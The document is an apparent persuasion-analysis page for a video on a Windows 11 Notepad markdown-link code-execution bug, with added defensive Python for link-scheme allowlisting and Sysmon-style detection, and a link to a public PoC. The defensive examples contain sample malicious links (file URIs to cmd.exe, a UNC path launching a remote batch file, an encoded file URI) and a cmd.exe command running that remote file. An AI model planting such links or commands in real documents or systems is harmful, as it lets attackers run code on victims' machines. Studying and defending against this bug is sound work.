Analysis Summary
Ask yourself: “Did I notice what this video wanted from me, and did I decide freely to say yes?”
Direct appeal
Explicitly telling you what to do — subscribe, donate, vote, share. Unlike subtler techniques, it works through clarity and urgency. Most effective when preceded by emotional buildup that makes the action feel like a natural next step.
Compliance literature (Cialdini & Goldstein, 2004); foot-in-the-door (Freedman & Fraser, 1966)
Worth Noting
Positive elements
- The video provides a clear, accessible breakdown of how URI handling in markdown parsers can lead to remote code execution in seemingly simple apps.
Be Aware
Cautionary elements
- The seamless integration of the sponsor's product as the primary 'architectural' solution to the problem described.
Knowing about these techniques makes them visible, not powerless. The ones that work best on you are the ones that match beliefs you already hold.
This analysis is a tool for your own thinking — what you do with it is up to you.
Transcript
This is a video I never thought I'd have to make. "Windows 11 Notepad flaw lets files execute silently via markdown links." Now, while this headline is hilarious, and while the bug is very simple, I want to dive into some of the FUD that's kind of floating around on Twitter and Reddit about this bug. I think this bug is actually way less impressive and way less hilarious than people are making it out to be. But I do want to highlight kind of this feature bloat issue we're running into with simple utilities, especially in Windows, and maybe we can talk about ways to get around that in the future. And also, the sponsor of today's video is ThreatLocker, and that matters a lot for kind of like the zero trust issue that this presents in the video.

"Microsoft has fixed a remote code execution vulnerability in Windows 11 Notepad that allowed attackers to execute local or remote programs by tricking users into clicking specifically crafted markdown links without displaying any Windows security warnings." Now, this is actually true. I have a PoC that I'll go here and show in a second. But for a long time, guys, if you're not aware, Notepad used to be this utility that was very simple. It was a dumb utility where you put text into it, and that was literally it. With the removal of WordPad, which was the rich text format editor that Windows had for a long time, they had to kind of add some new features to Notepad to allow it to render or edit different text editor types, right? So one of the text types is Markdown. If you're not sure how Markdown works, Markdown is this really neat format that allows you to represent formatted text using unformatted text. You basically say, "Hey, here in the unrendered version, we're going to have a heading of level one," and we can say that that means that it's big, right? And so when you render it, it'll show this instead of this.

It allows you to transport Word-like files without Word-like sizes. It's a very cool format. Now, the issue, obviously, like anything, is if you allow an external resource to be inside of that file, like a link, for example, or an image. You know, if that link goes to a place that is potentially unsanitized, it may lead to bigger issues, right? And so the vulnerability supposedly, and again there isn't any Microsoft resource confirming this, but what I'm reading from PoCs online, is that the remote code execution flaw basically is there is an unhandled file URI that you can use, that if you click on the link that contains a file URI, it will reach out and run that program. Right now, here you're like, "Oh, it's only running a local command.exe. Who cares?" Well, if you, for example, were to have a PoC like this, we can actually use network protocols like SMB, for example, to reach out over the network and download these files. So this is actually pretty bad from an attacking perspective, right? If I'm able to convince a user to go here and click, for example, they have to Ctrl-click. Before the update that came out, this popup that says the link may be unsafe wouldn't have popped up, right? So, you know, there is a user click involved. So I click on this, but then I do want to highlight there is a security warning, right? The vulnerability said no security warnings. Well, I'm going to actually run a file that is not signed by Microsoft or by some trusted publisher, right?

And so as a result I will get this security warning, but ultimately I can run the file. And, you know, this is just me proving that I actually have execution, right? It's a batch file, but this could be an EXE, it could be Python, whatever. Okay, so this bug does exist. Now I want to just highlight that I think the bug is not as impressive as people are making it out to be, potentially. Like, you get RCE, but you have to get the user not only to download the file, but then open it as Markdown in Notepad, and then to click and run the binary that gets popped up. Again, look, this prompt didn't exist, but this one still pops up. So this is, you know, a little bit of protection.

I want to highlight there's a lot of people talking online about how, like, Copilot being included into this and, like, Microsoft's push for AI is the reason for this bug. I don't think this bug came out because of AI. Like, a bug like this, where an external resource is not properly sanitized and allows a URI to do basically request forgery, that isn't new, right? That isn't a thing that has just begun to exist because of AI and solification, right? What I do want to highlight, though, is this wouldn't have occurred if we just left Notepad alone and decided to not include new features into it, right? To not make it a Markdown renderer, to not add new features to the thing. They put this very well on Hacker News: "We've officially reached the logical conclusion of the feature bloat to vulnerability pipeline.

For nearly 30 years, Notepad.exe was the gold standard for a dumb utility. It was a simple Win32-backed buffer for strings. Did exactly one thing: display text. Pending literally a vulnerability in the way that Notepad displayed text, which is almost impossible to get wrong as you, like, read the file size correctly, this could never have happened."

Okay, now let's be real. You can't stop zero days from happening, but one thing you can do is defend against them with today's video sponsor, ThreatLocker. ThreatLocker is a zero trust endpoint protection platform designed around stopping hackers from getting a foothold in your network. Here we're on a workstation at Big Corp Incorporated LLC, where a user has downloaded a suspicious PowerShell script and they're about to run it. Not great. Because ThreatLocker knows the baseline of this computer, using its learning mode where it learned what is allowed during a good baseline, ThreatLocker will detect this and block the execution of the script. Someone in the SOC for this network will get an alert and can either deny it or, my favorite feature, allow it with ThreatLocker's ring-fencing technology. They can run the script, but deny access to other parts of the computer, like the user's files, or even deny internet access to the script. And the SOC even gets the ability to run the script in a sandbox environment to see what it does before they either approve or deny the access. Using my link right here, go check out ThreatLocker. And next time that zero trust comes up at your company, give ThreatLocker a shot. Thanks again, ThreatLocker, for sponsoring this video. Back to the video.

The issue that I have with Notepad in its current state, and again, I don't blame any engineers for this, this is like a very normal mistake to make. One way that people could have defended against this sort of thing is by using some sort of ring-fencing zero trust technology to basically just say, "Hey, the Notepad process should never reach out to the internet," right? It should not be able to go out and grab a file, or even to leave the computer, right? Like, this isn't going to the internet; it goes to, like, maybe a local malicious store. But, you know, if you deny the Notepad process access to the network stack, this can't happen. Well, the issue that arises is now, because Copilot exists on this computer, and it has to make a call to Microsoft's SSO to log in and give you access to Copilot, because that is a thing, it is now normal for notepad.exe potentially to reach out and touch the internet. We've created this weird feature bloat where, because we have bloated so many features into software, we are now unsure of what privileges a process should have. Like, previously, if I migrated a DLL into a Notepad process and ran malware in the process, right? If you see notepad.exe making network connections, you're hacked, right? That is just how it is. But now we have this weird issue where it's like, okay, but Notepad has Copilot, and maybe the Copilot DLL has sockets that connect to the internet. It's just this weird inclusion of features that make it very hard to reason about what matters from a defender standpoint. As we add new parsers and new features into these tools, it becomes very hard to limit the amount of privilege we give to these things, because they are expected to do everything, right?

And the question, by the way, I'm sure you're all asking: would Rust have fixed this? Actually, no. Again, I don't know how this is integrated. I don't know what broke here, but I'm imagining that there is probably a Markdown rendering library that's written in Rust that has, like, a Win32 backend. And if it renders images the same way that this does, this isn't like a memory corruption vulnerability issue, right? This is literally just a failure to sanitize, or, you know, a lack of threat modeling on where this renderer lives, so that when you click on it you get, you know, a callout and an execution. So would Rust fix this? No. Anyway, guys, yeah, I don't know. It's just like, stop adding features to things that are not broken. Thanks for watching. Check out that gold plaque and then this new video. See you next time. Goodbye.
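The check the transcript describes as missing (a renderer that hands any link target straight to the OS opener) as an added Python example. This is not Notepad's code, not Microsoft's fix, and not from the video. It assumes an allowlist of http, https and mailto (an assumption for the example; a product would choose its own), refuses file: URIs, UNC/SMB paths and drive-letter paths as local-launch targets, and percent-decodes and strips leading control characters before reading the scheme, since those are the usual ways a naive scheme check is bypassed. The sample markdown document is constructed, not a real PoC file.

```python
"""Scheme allowlist for markdown link targets before they reach the OS.

Added example: not Notepad's code, not Microsoft's fix, not from the video.
Only inline [text](target) links are parsed, which is enough to show the check.
"""
import re
from urllib.parse import unquote, urlsplit

# Assumption for this example: the only link kinds a text editor should open.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

# Inline links, with or without the <...> form around the target.
_LINK_RE = re.compile(r"\[([^\]]*)\]\(\s*<?([^)\s>]+)>?\s*\)")

# Leading bytes some URL parsers silently discard before reading the scheme.
_LEADING_JUNK = "".join(chr(c) for c in range(0x21)) + "\x7f"

# C:\..., c:/... and friends.
_DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:[\\/]")


def classify_target(target: str) -> tuple[bool, str]:
    """Decide whether a link target may be opened. Returns (allowed, reason).

    Anything that would make the OS launch a local or remote file is refused:
    file: URIs, UNC/SMB paths, drive-letter paths, and targets with no scheme
    (which a shell-style opener resolves relative to the document).
    """
    # Decode first so "fi%6ce:" is seen as "file:", then drop leading junk.
    t = unquote(target).strip(_LEADING_JUNK)
    if t.startswith(("\\\\", "//")):
        return False, "unc-path"
    if _DRIVE_PATH_RE.match(t):
        return False, "local-path"
    parts = urlsplit(t.replace("\\", "/"))
    scheme = parts.scheme.lower()
    if not scheme:
        return False, "no-scheme"
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme-not-allowed:{scheme}"
    if scheme != "mailto" and not parts.netloc:
        return False, "no-host"
    return True, "ok"


def check_document(markdown_text: str) -> list[dict]:
    """Run every inline link in a markdown document through classify_target."""
    results = []
    for m in _LINK_RE.finditer(markdown_text):
        text, target = m.group(1), m.group(2)
        allowed, reason = classify_target(target)
        results.append({"text": text, "target": target,
                        "allowed": allowed, "reason": reason})
    return results


# Constructed sample document, not a real PoC file.
SAMPLE_DOC = (
    "# Release notes\n"
    "See the [docs](https://example.com/docs) or [email us](mailto:help@example.com).\n"
    "Click to [view the changelog](file:///C:/Windows/System32/cmd.exe).\n"
    "Or [open the report](\\\\fileserver.example\\public\\report.bat).\n"
    "Encoded: [here](fi%6ce:///C:/Users/Public/x.bat)\n"
)

if __name__ == "__main__":
    for r in check_document(SAMPLE_DOC):
        verdict = "open" if r["allowed"] else "BLOCK"
        print(f'{verdict:5} {r["reason"]:24} {r["target"]}')
```

The allowlist is the point: a denylist of "file:" alone misses the UNC form, the encoded form and the schemeless relative path, all of which a shell-style opener will happily launch. The remaining user-facing prompt the video shows (the unsigned-publisher warning) is a second line of defence, not a substitute for this check.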
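The detection point the transcript makes (notepad.exe making network connections used to mean compromise, and the Copilot sign-in makes that rule noisier) as an added Python example, not from the video and not any vendor's product. It runs two rules over constructed Sysmon-style events: notepad.exe spawning a child process (Event ID 1 with notepad.exe as the parent), and notepad.exe opening a network connection (Event ID 3) either to an SMB port or to a host outside an expected set. The expected-host set is an assumption for the example, not a published list of what Copilot contacts, and the event records are constructed.

```python
"""Two detection rules for the post-click side of the Notepad bug.

Added example, not from the video or any vendor product. Events are
constructed to carry Sysmon-style fields for Event ID 1 (process create)
and Event ID 3 (network connect); EXPECTED_HOSTS is an assumption for the
example, not a published list of what Copilot contacts.
"""
import json
from typing import Optional

SMB_PORTS = {139, 445}
WATCHED = "notepad.exe"
# Assumption: sign-in/service hosts the built-in Copilot integration may reach.
EXPECTED_HOSTS = {"login.microsoftonline.com", "copilot.microsoft.com"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious event, else None."""
    eid = event.get("EventID")
    image = _basename(event.get("Image", ""))
    # Rule 1: a text editor has no reason to start other programs.
    if eid == 1 and _basename(event.get("ParentImage", "")) == WATCHED:
        return {"severity": "high",
                "rule": "notepad.exe spawned a child process",
                "detail": event.get("CommandLine", "")}
    # Rule 2: outbound connections, with the Copilot sign-in carved out.
    if eid == 3 and image == WATCHED:
        port = int(event.get("DestinationPort", 0))
        host = event.get("DestinationHostname", "").lower()
        if port in SMB_PORTS:
            return {"severity": "high",
                    "rule": "notepad.exe SMB connection",
                    "detail": f"{host}:{port}"}
        if host not in EXPECTED_HOSTS:
            return {"severity": "medium",
                    "rule": "notepad.exe connection to unexpected host",
                    "detail": f"{host}:{port}"}
    return None


def run(lines: list[str]) -> list[dict]:
    """Evaluate newline-delimited JSON events and collect the alerts."""
    alerts = []
    for line in lines:
        alert = evaluate(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed events, not real telemetry.
EVENTS = [json.dumps(e) for e in [
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationHostname": "login.microsoftonline.com",
     "DestinationIp": "20.190.1.1", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationHostname": "fileserver.example",
     "DestinationIp": "203.0.113.7", "DestinationPort": 445},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"cmd.exe /c \\fileserver.example\public\report.bat"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "example.com",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationHostname": "cdn.example",
     "DestinationIp": "198.51.100.9", "DestinationPort": 443},
]]

if __name__ == "__main__":
    for a in run(EVENTS):
        print(f'[{a["severity"]}] {a["rule"]}: {a["detail"]}')
```

The child-process rule is the one that survives feature bloat: whatever Copilot adds to Notepad's network profile, a Markdown link that ends in a batch file running still shows up as notepad.exe becoming a parent. The SMB rule catches the remote-payload variant directly; the unexpected-host rule is the one that needs tuning as the allowed destinations change.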
Video description
Go secure your notepad.exe with Threatlocker! https://go.lowlevel.tv/threatlocker2026 Next time you hear zero trust, give threatlocker a shot.
PoC: https://github.com/BTtea/CVE-2026-20841-PoC
🏫 MY COURSES Sign-up for my FREE 3-Day C Course: https://lowlevel.academy
🧙♂️ HACK YOUR CAREER Wanna learn to hack? Join my new CTF platform: https://stacksmash.io
⌨️ KEYBOARD Like what you hear? Grab a Q5 at https://go.lowlevel.tv/keyboard
🔥COME HANG OUT Check out my other stuff: https://lowlevel.tv